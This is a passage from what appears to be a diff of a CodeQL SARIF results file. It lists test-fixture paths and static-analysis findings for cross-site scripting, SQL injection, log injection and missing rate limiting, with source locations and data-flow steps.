"location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 377 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 378 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 380 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 381 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 383 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 384 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 385 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 386 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 390 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 391 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 392 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 394 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 395 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 397 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 400 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 401 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 410 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 412 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 413 + } + }, { + "location" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 414 + } + }, { + "location" : { + "uri" : "scripts/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 415 + } + }, { + "location" : { + "uri" : "scripts/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 416 + } + } ], + "results" : [ { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6311a9ed7e4091a4:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 4, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 3, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 11, + "startColumn" : 20, + "endColumn" : 25 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "8e517fc6fdf32a1a:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 11, + "startColumn" : 20, + "endColumn" : 25 + } + }, + "message" : { + "text" : "value" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 19, + "startColumn" : 20, + "endColumn" : 26 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "c51cf11a085c01f4:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 18, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 19, + "startColumn" : 20, + "endColumn" : 26 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 17, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/xss", + "rule" : { + "id" : "js/xss", + "index" : 34, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Cross-site scripting vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 27, + "startColumn" : 20, + "endColumn" : 26 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "e309bf8540256a05:1", + "primaryLocationStartColumnFingerprint" : "15" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "documen ... .search" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 9, + "endColumn" : 41 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 39, + "endColumn" : 44 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 18, + "endColumn" : 45 + } + }, + "message" : { + "text" : "jQuery. ... (value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 26, + "startColumn" : 9, + "endColumn" : 45 + } + }, + "message" : { + "text" : "value1" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 27, + "startColumn" : 20, + "endColumn" : 26 + } + }, + "message" : { + "text" : "value1" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + }, + "region" : { + "startLine" : 25, + "startColumn" : 17, + "endColumn" : 41 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/missing-rate-limiting", + "rule" : { + "id" : "js/missing-rate-limiting", + "index" : 68, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "This route handler performs [a database access](1), but is not rate-limited." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 40, + "startColumn" : 25, + "endLine" : 44, + "endColumn" : 8 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "ac6d3bdd3d52ea9b:1", + "primaryLocationStartColumnFingerprint" : "18" + }, + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 9, + "endLine" : 43, + "endColumn" : 11 + } + }, + "message" : { + "text" : "a database access" + } + } ] + }, { + "ruleId" : "js/sql-injection", + "rule" : { + "id" : "js/sql-injection", + "index" : 78, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "This query string depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "4fc3122b51f477a1:1", + "primaryLocationStartColumnFingerprint" : "11" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + }, + "region" : { + "startLine" : 41, + "startColumn" : 20, + "endColumn" : 40 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 19, + "endColumn" : 36 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "ccc6f77c65eccb45:1", + "primaryLocationStartColumnFingerprint" : "12" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "req2.params.category" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 31 + } + }, + "message" : { + "text" : "{ book, quantity }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 15, + "endColumn" : 19 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 13, + "endColumn" : 54 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 32, + "endColumn" : 36 + } + }, + "message" : { + "text" : "book" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 26, + "startColumn" : 19, + "endColumn" : 36 + } + }, + "message" : { + "text" : "\"console:\" + book" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + }, + "region" : { + "startLine" : 23, + "startColumn" : 34, + "endColumn" : 54 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 18, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "be9a18716e55d497:1", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "jQuery. ... param\")" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 9, + "endColumn" : 51 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 34, + "endColumn" : 39 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 7, + "startColumn" : 18, + "endColumn" : 41 + } + }, + "message" : { + "text" : "`[INFO] ... value}`" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 6, + "startColumn" : 17, + "endColumn" : 51 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/log-injection", + "rule" : { + "id" : "js/log-injection", + "index" : 92, + "toolComponent" : { + "index" : 3 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 15, + "startColumn" : 18, + "endColumn" : 41 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "be9a18716e55d497:2", + "primaryLocationStartColumnFingerprint" : "13" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 23, + "endColumn" : 30 + } + }, + "message" : { + "text" : "req.url" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 13, + "endColumn" : 37 + } + }, + "message" : { + "text" : "url.par ... , true)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 13, + "startColumn" : 9, + "endColumn" : 37 + } + }, + "message" : { + "text" : "q" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 14, + "startColumn" : 17, + "endColumn" : 18 + } + }, + "message" : { + "text" : "q" + } + } + }, { + 